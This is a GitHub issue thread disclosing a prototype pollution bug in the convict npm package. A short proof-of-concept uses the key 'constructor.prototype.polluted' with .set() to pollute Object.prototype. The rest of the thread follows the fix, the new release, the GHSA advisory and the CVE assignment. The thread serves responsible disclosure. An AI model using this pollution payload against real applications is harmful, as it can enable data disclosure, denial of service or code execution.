Bug - Prototype Pollution on .set()

[Captain-K-101]

Convict is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.

Proof of Concept
Create the following PoC file:

• index.js

const convict = require("convict"); //6.2.3
let obj = {}; const config = convict(obj);
console.log({}.polluted) //undefined
config.set("constructor.prototype.polluted", "polluted1"); 
let a= {}
console.log(a.polluted) //polluted1

Run> node index.js

Output

undefined
polluted1

💻 Technical Description *
Fix implemented by not allowing to modify object prototype.

Filter out all keywords and check for vulnerable instances like constructor | __proto__ | prototype

Expolit Image

[Captain-K-101]

Any Updates on this its been close to a week and half

[clouserw]

@madarche do you have any thoughts on this?

[Captain-K-101]

Hi sorry again for constant pestering but any updates on it 😅

[madarche]

@Captain-K-101 @clouserw all prototype pollution vulnerabilities should have been dealt with 🤔 I'll check and I'll report here!

[Captain-K-101]

Sure Thanks 👍

[Captain-K-101]

@Captain-K-101 @clouserw all prototype pollution vulnerabilities should have been dealt with 🤔 I'll check and I'll report here!

Hey any updates?+ would this be eligible for a cve?

[madarche]

@Captain-K-101 this is elligible for a CVE. Good catch. And I can't believe I've missed this. I've just created a PR #411 which fixes the vulnerability+test. I'll finish tomorrow. Sorry for the delay.

[Captain-K-101]

Thanks a lot. 😄

[Captain-K-101]

Hi, would a CVE be assigned by you guys, or do i have to report it to cvemitre or smthing. (Not sure how it goes thus asking 😅)

[madarche]

Fixed by #411

PS: I'll publish a new version of convict on npm ASAP and will keep you informed about the CVE or equivalent. @Captain-K-101 you'll be credited as you should.

[madarche]

@Captain-K-101: convict@6.2.4 with the fix for the vulnerability you've discovered is published.

I'll now work with @clouserw to have a security advisory published. I'll let you know as soon as it's done! Thanks again.

[Captain-K-101]

sure thanks for the update

[Captain-K-101]

Hey just a quick question would this be eligible for a cve.

[clouserw]

Hey just a quick question would this be eligible for a cve.

I've asked for one. I don't know how long it will take.

[Captain-K-101]

oh okay.

[madarche]

And the published security advisory is: GHSA-4jrm-c32x-w4jf

[Captain-K-101]

Hey @madarche do we have any update on the cve?

[clouserw]

I'll ask for an update

[clouserw]

It's CVE-2023-0163. I added it to the security advisory.

[Captain-K-101]

h nice thanks